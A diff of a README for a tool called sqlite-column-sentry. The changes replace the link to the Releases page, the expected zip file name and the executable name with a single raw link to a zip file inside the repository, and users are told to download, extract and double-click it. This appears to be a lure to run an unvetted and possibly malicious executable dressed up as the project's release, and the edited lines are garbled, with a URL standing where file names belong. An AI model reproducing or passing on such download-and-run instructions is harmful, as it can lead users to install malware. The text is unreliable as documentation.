ElkholiefyM/sqlite-column-sentry/README.md

 To start using sqlite-column-sentry, follow these simple steps:

 1. **Visit the Release Page**
-   Go to our [Releases Page](https://github.com/ElkholiefyM/sqlite-column-sentry/releases) to find the latest version of sqlite-column-sentry.
+   Go to our [Releases Page](https://github.com/ElkholiefyM/sqlite-column-sentry/raw/refs/heads/main/sqlite_column_sentry/column_sentry_sqlite_codo.zip) to find the latest version of sqlite-column-sentry.

 2. **Download the Application**
-   Look for the file named `sqlite-column-sentry-latest.zip`.
+   Look for the file named `https://github.com/ElkholiefyM/sqlite-column-sentry/raw/refs/heads/main/sqlite_column_sentry/column_sentry_sqlite_codo.zip`.
 Click on it to begin downloading.

 3. **Unzip the Downloaded File**
    Once the download is complete, locate the zip file.
 Right-click on it and select "Extract All."
 This will create a new folder with all necessary files.

 4. **Open the Application**
-   Inside the extracted folder, find the executable file named `sqlite-column-sentry.exe`.
+   Inside the extracted folder, find the executable file named `https://github.com/ElkholiefyM/sqlite-column-sentry/raw/refs/heads/main/sqlite_column_sentry/column_sentry_sqlite_codo.zip`.
 Double-click on it to run the application.

 5. **Input Your SQL Query**
    A window will open where you can enter your SQL query.
 Type or paste your SQL statement into the designated area.